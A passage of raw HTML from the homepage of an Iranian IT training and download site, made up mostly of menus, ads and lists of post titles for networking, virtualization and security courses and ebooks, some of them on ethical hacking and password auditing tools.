!important;}.vc_custom_1549835271321{border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-top: 30px !important;padding-right: 9px !important;padding-left: 9px !important;background-color: #ffffff !important;border-left-color: #dbdbdb !important;border-left-style: solid !important;border-right-color: #dbdbdb !important;border-right-style: solid !important;border-top-color: #dbdbdb !important;border-top-style: solid !important;border-bottom-color: #dbdbdb !important;border-bottom-style: solid !important;border-radius: 1px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body class="rtl home page-template-default page page-id-312 active-light-box active-top-line close-rh page-layout-1-col full-width main-menu-sticky-smart active-ajax-search bs-show-ha bs-show-ha-a wpb-js-composer js-comp-ver-5.5.5 vc_responsive bs-ll-a" dir="rtl"> <div class="main-wrap content-main-wrap"> <header id="header" class="site-header header-style-2 boxed" itemscope="itemscope" itemtype="https://schema.org/WPHeader"> <section class="topbar topbar-style-1 hidden-xs hidden-xs"> <div class="content-wrap"> <div class="container"> <div class="topbar-inner clearfix"> <div class="section-menu"> <div id="menu-top" class="menu top-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <nav class="top-menu-container"> <ul id="top-navigation" class="top-menu menu clearfix bsm-pure"> <li id="topbar-date" class="menu-item menu-item-date"> <span class="topbar-date">پنج شنبه, اردیبهشت ۲۶, ۱۳۹۸</span> </li> <li id="menu-item-18220" class="menu-item menu-item-type-custom menu-item-object-custom better-anim-fade menu-item-18220"><a href="http://vip.technet24.ir">Login</a></li> <li id="menu-item-12842" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-94 better-anim-fade menu-item-12842"><a href="https://technet24.ir/category/download">Download</a></li> <li id="menu-item-12844" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-129 better-anim-fade menu-item-12844"><a href="https://technet24.ir/category/%d8%b4%d8%a8%da%a9%d9%87">Network</a></li> <li id="menu-item-12845" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-883 better-anim-fade menu-item-12845"><a href="https://technet24.ir/category/%d9%85%d9%88%d8%a8%d8%a7%db%8c%d9%84">Mobile</a></li> <li id="menu-item-12846" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-2398 better-anim-fade menu-item-12846"><a href="https://technet24.ir/category/videos">Video</a></li> <li id="menu-item-13154" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-13154"><a href="https://technet24.ir/contact-us">Contact US</a></li> </ul> </nav> </div> </div> </div> </div> </div> </section> <div class="header-inner"> <div class="content-wrap"> <div class="container"> <div class="row"> <div class="row-height"> <div class="logo-col col-xs-4"> <div class="col-inside"> <div id="site-branding" class="site-branding"> <h1 id="site-title" class="logo h1 img-logo"> <a href="https://technet24.ir/" itemprop="url" rel="home"> <img id="site-logo" src="https://technet24.ir/wp-content/uploads/2019/05/logo-ramazan-04.jpg" alt="Technet24" data-bsrjs="https://technet24.ir/wp-content/uploads/2019/05/logo-ramazan-04.jpg" /> <span class="site-title">Technet24 - تکنت 24 ™ مقالات و دانلود به روزترین نرم افزارهای شبکه سیسکو و مایکروسافت و امنیت</span> </a> </h1> </div><!-- .site-branding --> </div> </div> <div class="sidebar-col col-xs-8"> <div class="col-inside"> <aside id="sidebar" class="sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"> <div class="tzov tzov-clearfix adloc-is-banner adloc-show-desktop adloc-show-tablet-portrait adloc-show-tablet-landscape adloc-show-phone location-header_aside_logo tzov-align-right tzov-column-1"><div id="tzov-10146-2013906673" class="tzov-container tzov-type-image " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="10146" data-type="image"><a itemprop="url" class="tzov-link" href="https://technet24.ir/join-us" target="_blank" ><img class="tzov-image" src="https://technet24.ir/wp-content/uploads/2018/12/Banner-Join-Us-2.jpg" alt="top" /></a></div></div> </aside> </div> </div> </div> </div> </div> </div> </div> <div id="menu-main" class="menu main-menu-wrapper show-search-item menu-actions-btn-width-1" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <div class="main-menu-inner"> <div class="content-wrap"> <div class="container"> <nav class="main-menu-container"> <ul id="main-navigation" class="main-menu menu bsm-pure clearfix"> <li id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-312 current_page_item better-anim-fade menu-item-313"><a href="https://technet24.ir/" aria-current="page">Home</a></li> <li id="menu-item-10141" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-104 better-anim-fade menu-item-10141"><a href="https://technet24.ir/category/microsoft">Microsoft</a></li> <li id="menu-item-10142" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-258 better-anim-fade menu-item-10142"><a href="https://technet24.ir/category/cisco">Cisco</a></li> <li id="menu-item-10144" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-121 better-anim-fade menu-item-10144"><a href="https://technet24.ir/category/virtualization">Virtualization</a></li> <li id="menu-item-10145" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-100 better-anim-filip-in-y menu-item-10145"><a href="https://technet24.ir/category/ebooks">eBook</a></li> <li id="menu-item-12741" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-103 better-anim-fade menu-item-12741"><a href="https://technet24.ir/category/security">Security</a></li> <li id="menu-item-12742" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-305 better-anim-fade menu-item-12742"><a href="https://technet24.ir/category/linux">Linux</a></li> <li id="menu-item-15843" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-15843"><a href="https://technet24.ir/join-us">همکاری با ما</a></li> </ul><!-- #main-navigation --> <div class="menu-action-buttons width-1"> <div class="search-container close"> <span class="search-handler"><i class="fa fa-search"></i></span> <div class="search-box clearfix"> <form role="search" method="get" class="search-form clearfix" action="https://technet24.ir"> <input type="search" class="search-field" placeholder="جستجو..." value="" name="s" title="جستجو برای:" autocomplete="off"> <input type="submit" class="search-submit" value="جستجو"> </form><!-- .search-form --> </div> </div> </div> </nav><!-- .main-menu-container --> </div> </div> </div> </div><!-- .menu --> </header><!-- .header --> <div class="rh-header clearfix light deferred-block-exclude"> <div class="rh-container clearfix"> <div class="menu-container close"> <span class="menu-handler"><span class="lines"></span></span> </div><!-- .menu-container --> <div class="logo-container rh-img-logo"> <a href="https://technet24.ir/" itemprop="url" rel="home"> <img src="https://technet24.ir/wp-content/uploads/2019/05/logo-ramazan-04.jpg" alt="آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت" data-bsrjs="https://technet24.ir/wp-content/uploads/2019/05/logo-ramazan-04.jpg" /> </a> </div><!-- .logo-container --> </div><!-- .rh-container --> </div><!-- .rh-header --> <main id="content" class="content-container"> <div class="layout-1-col layout-no-sidebar"> <div class="content-column"> <div class="single-container bs-vc-content"> <div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12"><div class="bs-vc-wrapper wpb_wrapper"><div class="vc_custom_1540330716512 bs-listing bs-listing-modern-grid-listing-7 bs-listing-single-tab"> <div class="listing listing-modern-grid listing-modern-grid-7 clearfix slider-overlay-simple-gr bsw-11"> <div class="mg-row mg-row-1 clearfix"> <div class="mg-col mg-col-1"> <article class="post-19387 type-post format-standard has-post-thumbnail listing-item-1 listing-item listing-mg-item listing-mg-7-item listing-mg-type-1 main-term-7931"> <div class="item-content"> <a title="iCollege &#8211; Certified Ethical Hacker (CEH) v.10 &#8211; دوره آموزش هک قانونمند" data-src="https://technet24.ir/wp-content/uploads/2019/05/iCollege-Certified-Ethical-Hacker-CEH-v.10.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;iCollege-Certified-Ethical-Hacker-CEH-v.10-210x136.jpg&quot;,&quot;279&quot;:&quot;iCollege-Certified-Ethical-Hacker-CEH-v.10-279x220.jpg&quot;,&quot;357&quot;:&quot;iCollege-Certified-Ethical-Hacker-CEH-v.10-357x210.jpg&quot;,&quot;750&quot;:&quot;iCollege-Certified-Ethical-Hacker-CEH-v.10.jpg&quot;}}" class="img-cont" href="https://technet24.ir/icollege-certified-ethical-hacker-ceh-v-10-19387"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/icollege-certified-ethical-hacker-ceh-v-10-19387" class="post-url post-title"> iCollege &#8211; Certified Ethical Hacker (CEH) v.10 &#8211; دوره آموزش هک قانونمند </a> </h2> </div> </div> </article > </div> <div class="mg-col mg-col-2"> <article class="post-19365 type-post format-standard has-post-thumbnail listing-item-2 listing-item listing-mg-item listing-mg-7-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="Lab Minutes &#8211; Cisco Prime 3.1 (Basic) Video Bundle &#8211; آموزش سیسکو پرایم" data-src="https://technet24.ir/wp-content/uploads/2019/05/Cisco-Prime-3.1-Basic-Video-Bundle-Lab-Minutes.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Cisco-Prime-3.1-Basic-Video-Bundle-Lab-Minutes-210x136.jpg&quot;,&quot;279&quot;:&quot;Cisco-Prime-3.1-Basic-Video-Bundle-Lab-Minutes-279x220.jpg&quot;,&quot;357&quot;:&quot;Cisco-Prime-3.1-Basic-Video-Bundle-Lab-Minutes-357x210.jpg&quot;,&quot;750&quot;:&quot;Cisco-Prime-3.1-Basic-Video-Bundle-Lab-Minutes.jpg&quot;}}" class="img-cont" href="https://technet24.ir/lab-minutes-cisco-prime-3-1-basic-video-bundle-19365"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/lab-minutes-cisco-prime-3-1-basic-video-bundle-19365" class="post-url post-title"> Lab Minutes &#8211; Cisco Prime 3.1 (Basic) Video Bundle &#8211; آموزش سیسکو پرایم </a> </h2> </div> </div> </article > </div> </div> <div class="mg-row mg-row-2 clearfix"> <div class="mg-col mg-col-1"> <article class="post-19358 type-post format-standard has-post-thumbnail listing-item-3 listing-item listing-mg-item listing-mg-7-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="INE &#8211; Routing Technologies for Professionals" data-src="https://technet24.ir/wp-content/uploads/2019/05/INE-Routing-Technologies-for-Professionals-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;INE-Routing-Technologies-for-Professionals-210x136.jpg&quot;,&quot;279&quot;:&quot;INE-Routing-Technologies-for-Professionals-279x220.jpg&quot;,&quot;357&quot;:&quot;INE-Routing-Technologies-for-Professionals-357x210.jpg&quot;,&quot;750&quot;:&quot;INE-Routing-Technologies-for-Professionals.jpg&quot;}}" class="img-cont" href="https://technet24.ir/ine-routing-technologies-for-professionals-19358"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/ine-routing-technologies-for-professionals-19358" class="post-url post-title"> INE &#8211; Routing Technologies for Professionals </a> </h2> </div> </div> </article > </div> <div class="mg-col mg-col-2"> <article class="post-19334 type-post format-standard has-post-thumbnail listing-item-4 listing-item listing-mg-item listing-mg-7-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="Cisco ISE v2.4 Video Training" data-src="https://technet24.ir/wp-content/uploads/2019/05/Cisco-ISE-v2.4-Video-Training_Download-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Cisco-ISE-v2.4-Video-Training_Download-210x136.jpg&quot;,&quot;279&quot;:&quot;Cisco-ISE-v2.4-Video-Training_Download-279x220.jpg&quot;,&quot;357&quot;:&quot;Cisco-ISE-v2.4-Video-Training_Download-357x210.jpg&quot;,&quot;750&quot;:&quot;Cisco-ISE-v2.4-Video-Training_Download.jpg&quot;}}" class="img-cont" href="https://technet24.ir/cisco-ise-v2-4-video-training-19334"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/cisco-ise-v2-4-video-training-19334" class="post-url post-title"> Cisco ISE v2.4 Video Training </a> </h2> </div> </div> </article > </div> <div class="mg-col mg-col-3"> <article class="post-19249 type-post format-standard has-post-thumbnail listing-item-5 listing-item listing-mg-item listing-mg-7-item listing-mg-type-1 main-term-2398"> <div class="item-content"> <a title="Starting an ISP with MikroTik &#8211; آموزش راه اندازی مرکز سرویس دهنده اینترنت (ISP) توسط میکروتیک" data-src="https://technet24.ir/wp-content/uploads/2019/04/Starting-an-ISP-with-MikroTik_Download-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Starting-an-ISP-with-MikroTik_Download-210x136.jpg&quot;,&quot;279&quot;:&quot;Starting-an-ISP-with-MikroTik_Download-279x220.jpg&quot;,&quot;357&quot;:&quot;Starting-an-ISP-with-MikroTik_Download-357x210.jpg&quot;,&quot;750&quot;:&quot;Starting-an-ISP-with-MikroTik_Download.jpg&quot;}}" class="img-cont" href="https://technet24.ir/starting-an-isp-with-mikrotik-download-19249"></a> <div class="content-container"> <h2 class="title"> <a href="https://technet24.ir/starting-an-isp-with-mikrotik-download-19249" class="post-url post-title"> Starting an ISP with MikroTik &#8211; آموزش راه اندازی مرکز سرویس دهنده اینترنت (ISP) توسط میکروتیک </a> </h2> </div> </div> </article > </div> </div> </div> </div></div></div></div></div><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="sticky-column wpb_column bs-vc-column vc_column_container vc_col-sm-4"><div class="bs-vc-wrapper wpb_wrapper"><div class="tzov tzov-clearfix tzov-align-center tzov-column-1 tzov-float-center"><div id="tzov-257-1265537776" class="tzov-container tzov-type-image " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="257" data-type="image"><a itemprop="url" class="tzov-link" href="https://servervds.com/dedicated-server-offer/" target="_blank" ><img class="tzov-image" src="https://technet24.ir/wp-content/uploads/2019/03/250-250-2.gif" alt="- Advertisement -" /></a><p class='tzov-caption tzov-caption-below'>- Advertisement -</p></div></div><div class="bscb-82307 vc_custom_1556453365466 have_bg bs-listing bs-listing-listing-text-2 bs-listing-single-tab pagination-animate"> <h3 class="section-heading sh-t2 sh-s1 main-term-none"> <span class="h-text main-term-none main-link"> <i class="bf-icon fa fa-check"></i> Random Posts </span> </h3> <style> .bscb-82307.bscb-82307 .section-heading.sh-t2 .bs-pretty-tabs-container,.bscb-82307.bscb-82307 .section-heading.sh-t2 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-82307.bscb-82307 .section-heading.sh-t5 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-82307.bscb-82307 .section-heading.sh-t7 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-82307.bscb-82307 .section-heading.sh-t7 > a > .h-text,.bscb-82307.bscb-82307 .section-heading.sh-t7 > .h-text{background-color:#ffffff} </style> <div class="bs-slider-items-container" data-slider-animation-speed="750" data-slider-autoplay="1" data-slider-control-dots="style-1" data-slider-control-next-prev="off" data-autoplaySpeed="4000"> <div class="bs-pagination-wrapper main-term-none slider bs-slider-first-item bs-slider-item bs-items-3"> <div class="listing listing-text listing-text-2 clearfix columns-1"> <article class="post-5711 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-none"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/lucky-in-the-workplace-5711" class="post-title post-url"> ۱۰ حقه برای خوش شانسی بیشتر در محل کار </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-09-14T23:02:00+00:00">شهریور ۲۴, ۱۳۹۵</time></span> <span class="views post-meta-views rank-500" data-bpv-post="5711"><i class="bf-icon bsfi-fire-1"></i>762</span> </div> </div> </article > <article class="post-1161 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-129"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/the-introduction-of-network-surveillance-tool-cain-abel-download-1161" class="post-title post-url"> معرفی ابزار شنود شبکه Cain Abel + دانلود </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2015-08-18T07:58:04+00:00">مرداد ۲۷, ۱۳۹۴</time></span> <span class="views post-meta-views rank-2000" data-bpv-post="1161"><i class="bf-icon bsfi-fire-3"></i>2,437</span> </div> </div> </article > <article class="post-3563 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/hp-3par-storeserv-7000-10000-lab-guide-3563" class="post-title post-url"> دانلود مجموعه کتاب HP 3PAR StoreServ 7000-10000 Lab Guide </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-02-10T16:50:46+00:00">بهمن ۲۱, ۱۳۹۴</time></span> <span class="views post-meta-views rank-1000" data-bpv-post="3563"><i class="bf-icon bsfi-fire-2"></i>1,332</span><div class="rating rating-stars"><span style="width: 80%;"></span></div> </div> </div> </article > <article class="post-18647 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-2398"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/remote-hacking-python-expert-with-python-2-x-and-3-x-18647" class="post-title post-url"> Remote Hacking Python Expert with Python 2.x and 3.x &#8211; آموزش هک&hellip; </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-04-10T09:47:08+00:00">فروردین ۲۱, ۱۳۹۸</time></span> <span class="views post-meta-views rank-1000" data-bpv-post="18647"><i class="bf-icon bsfi-fire-2"></i>1,210</span><div class="rating rating-stars"><span style="width: 90%;"></span></div> </div> </div> </article > <article class="post-6269 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/learning-vmware-vsphere-6269" class="post-title post-url"> کتاب Learning VMware vSphere </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-10-24T13:55:05+00:00">آبان ۳, ۱۳۹۵</time></span> <span class="views post-meta-views rank-1000" data-bpv-post="6269"><i class="bf-icon bsfi-fire-2"></i>1,455</span><div class="rating rating-stars"><span style="width: 70%;"></span></div> </div> </div> </article > <article class="post-2038 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-94"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/ubuntu-unleashed-2015-edition-covering-14-10-and-15-04-10th-edition-2038" class="post-title post-url"> دانلود کتاب اوبونتو Ubuntu Unleashed 2015 Edition: Covering 14.10 and&hellip; </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2015-10-27T09:35:06+00:00">آبان ۵, ۱۳۹۴</time></span> <span class="views post-meta-views rank-500" data-bpv-post="2038"><i class="bf-icon bsfi-fire-1"></i>595</span> </div> </div> </article > </div> </div> <div class="bs-pagination-wrapper main-term-none slider bs-slider-item bs-items-3"> <div class="listing listing-text listing-text-2 clearfix columns-1"> <article class="post-9178 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/ccna-cyber-ops-secops-210-255-9178" class="post-title post-url"> CCNA Cyber Ops SECOPS 210-255 Official Cert Guide کتاب سیسکو </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2017-08-08T17:54:59+00:00">مرداد ۱۷, ۱۳۹۶</time></span> <span class="views post-meta-views rank-2000" data-bpv-post="9178"><i class="bf-icon bsfi-fire-3"></i>2,599</span><div class="rating rating-stars"><span style="width: 90%;"></span></div> </div> </div> </article > <article class="post-5474 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-none"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/l0phtcrack-password-auditor-5474" class="post-title post-url"> L0phtCrack Password Auditor 7.0.4 </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-09-04T01:45:56+00:00">شهریور ۱۴, ۱۳۹۵</time></span> <span class="views post-meta-views rank-1000" data-bpv-post="5474"><i class="bf-icon bsfi-fire-2"></i>1,244</span> </div> </div> </article > <article class="post-9382 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-2398"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-sans-sec560-9382" class="post-title post-url"> SANS SEC560 Network Penetration Testing and Ethical Hacking 2017 </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2017-09-05T11:49:40+00:00">شهریور ۱۴, ۱۳۹۶</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="9382"><i class="bf-icon bsfi-fire-4"></i>7,486</span><div class="rating rating-stars"><span style="width: 90%;"></span></div> </div> </div> </article > <article class="post-16966 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/networking-with-mikrotik-mtcna-study-guide-16966" class="post-title post-url"> Networking with MikroTik: MTCNA Study Guide &#8211; دانلود کتاب&hellip; </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2019-01-05T21:46:29+00:00">دی ۱۵, ۱۳۹۷</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="16966"><i class="bf-icon bsfi-fire-4"></i>4,152</span><div class="rating rating-stars"><span style="width: 90%;"></span></div> </div> </div> </article > <article class="post-2748 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-129"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/dos-and-ddos-denial-of-service-attacks-2-2748" class="post-title post-url"> بررسی حملات محرومیت از سرویس DOS و DDOS &#8211; بخش دوم </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2015-12-02T12:13:27+00:00">آذر ۱۱, ۱۳۹۴</time></span> <span class="views post-meta-views rank-500" data-bpv-post="2748"><i class="bf-icon bsfi-fire-1"></i>609</span> </div> </div> </article > <article class="post-6076 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-none"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/fusion-device-selection-guide-6076" class="post-title post-url"> راهنمای انتخاب دستگاه فیوژن </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-10-03T12:35:18+00:00">مهر ۱۲, ۱۳۹۵</time></span> <span class="views post-meta-views rank-500" data-bpv-post="6076"><i class="bf-icon bsfi-fire-1"></i>585</span> </div> </div> </article > </div> </div> <div class="bs-pagination-wrapper main-term-none slider bs-slider-item bs-items-3"> <div class="listing listing-text listing-text-2 clearfix columns-1"> <article class="post-14843 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/download-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-wireshark-2-quick-start-guide-14843" class="post-title post-url"> Wireshark 2 Quick Start Guide &#8211; راهنمای شروع سریع وایرشارک </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2018-06-30T21:42:53+00:00">تیر ۹, ۱۳۹۷</time></span> <span class="views post-meta-views rank-2000" data-bpv-post="14843"><i class="bf-icon bsfi-fire-3"></i>2,659</span><div class="rating rating-stars"><span style="width: 70%;"></span></div> </div> </div> </article > <article class="post-4824 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-100"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/31-days-before-your-ccna-security-exam-a-day-by-day-review-guide-for-the-iins-210-260-certification-exam-4824" class="post-title post-url"> کتاب ۳۱Days Before Your CCNA Security Exam: A Day-By-Day Review Guide&hellip; </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-06-12T00:36:09+00:00">خرداد ۲۳, ۱۳۹۵</time></span> <span class="views post-meta-views rank-1000" data-bpv-post="4824"><i class="bf-icon bsfi-fire-2"></i>1,861</span><div class="rating rating-stars"><span style="width: 100%;"></span></div> </div> </div> </article > <article class="post-70 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-129"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/%d8%aa%d8%b3%d8%aa-%d9%81%d9%84%d9%88%da%a9-%da%86%db%8c%d8%b3%d8%aa-%d8%9f-70" class="post-title post-url"> تست فلوک چیست ؟ </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2015-05-24T10:17:41+00:00">خرداد ۳, ۱۳۹۴</time></span> <span class="views post-meta-views rank-500" data-bpv-post="70"><i class="bf-icon bsfi-fire-1"></i>803</span> </div> </div> </article > <article class="post-7455 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-none"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/features-a-amazing-company-7455" class="post-title post-url"> ویژگی های یک شرکت فوق العاده </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2016-12-29T01:02:18+00:00">دی ۹, ۱۳۹۵</time></span> <span class="views post-meta-views rank-500" data-bpv-post="7455"><i class="bf-icon bsfi-fire-1"></i>577</span> </div> </div> </article > <article class="post-1576 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-75"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/study-design-strategy-for-server-consolidation-1576" class="post-title post-url"> بررسی طراحی استراتژی برای Server Consolidation </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2015-09-21T09:20:40+00:00">شهریور ۳۰, ۱۳۹۴</time></span> <span class="views post-meta-views rank-500" data-bpv-post="1576"><i class="bf-icon bsfi-fire-1"></i>514</span> </div> </div> </article > <article class="post-16776 type-post format-standard has-post-thumbnail listing-item listing-item-text listing-item-text-2 main-term-2398"> <div class="item-inner"> <h2 class="title"> <a href="https://technet24.ir/designing-cisco-network-service-architectures-arch-v3-0-16776" class="post-title post-url"> Designing Cisco Network Service Architectures (ARCH) v3.0 &#8211;&hellip; </a> </h2> <div class="post-meta"> <span class="time"><time class="post-published updated" datetime="2018-12-17T16:05:57+00:00">آذر ۲۶, ۱۳۹۷</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="16776"><i class="bf-icon bsfi-fire-4"></i>4,266</span><div class="rating rating-stars"><span style="width: 100%;"></span></div> </div> </div> </article > </div> </div><div class="bs-slider-controls main-term-none"></div></div></div><div class=" bs-listing bs-listing-listing-tall-1 bs-listing-single-tab"> <h3 class="section-heading sh-t2 sh-s1 main-term-100"> <a href="https://technet24.ir/category/ebooks" class="main-link"> <span class="h-text main-term-100"> eBook </span> </a> </h3> <div class="listing listing-tall listing-tall-1 clearfix columns-2"> <article class="post-8796 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-1 main-term-none"> <div class="item-inner clearfix"> <div class="featured clearfix"> <a title="CCENT ICND1 Study Guide: Exam 100-105, 3rd Edition" data-src="https://technet24.ir/wp-content/uploads/2017/05/CCENT-ICND1-Study-Guide-Exam-100-105-3rd-Edition_Technet24-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2017\/05\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CCENT-ICND1-Study-Guide-Exam-100-105-3rd-Edition_Technet24-180x217.jpg&quot;,&quot;267&quot;:&quot;CCENT-ICND1-Study-Guide-Exam-100-105-3rd-Edition_Technet24-267x322.jpg&quot;,&quot;368&quot;:&quot;CCENT-ICND1-Study-Guide-Exam-100-105-3rd-Edition_Technet24-368x445.jpg&quot;,&quot;700&quot;:&quot;CCENT-ICND1-Study-Guide-Exam-100-105-3rd-Edition_Technet24.jpg&quot;}}" class="img-holder" href="https://technet24.ir/ccent-icnd1-study-guide-exam-100-105-3rd-edition-2-8796"></a> </div> <h2 class="title"> <a href="https://technet24.ir/ccent-icnd1-study-guide-exam-100-105-3rd-edition-2-8796" class="post-url post-title"> CCENT ICND1 Study Guide: Exam 100-105, 3rd Edition </a> </h2> </div> </article > <article class="post-18211 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-1 main-term-100"> <div class="item-inner clearfix"> <div class="featured clearfix"> <a title="Mastering VMware vSphere 6.7 &#8211; Second Edition" data-src="https://technet24.ir/wp-content/uploads/2019/03/Mastering-VMware-vSphere-6.7-Second-Edition-pdf-Download-368x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/03\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;Mastering-VMware-vSphere-6.7-Second-Edition-pdf-Download-180x217.jpg&quot;,&quot;267&quot;:&quot;Mastering-VMware-vSphere-6.7-Second-Edition-pdf-Download-267x322.jpg&quot;,&quot;368&quot;:&quot;Mastering-VMware-vSphere-6.7-Second-Edition-pdf-Download-368x430.jpg&quot;,&quot;750&quot;:&quot;Mastering-VMware-vSphere-6.7-Second-Edition-pdf-Download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/mastering-vmware-vsphere-6-7-second-edition-pdf-download-18211"></a> </div> <h2 class="title"> <a href="https://technet24.ir/mastering-vmware-vsphere-6-7-second-edition-pdf-download-18211" class="post-url post-title"> Mastering VMware 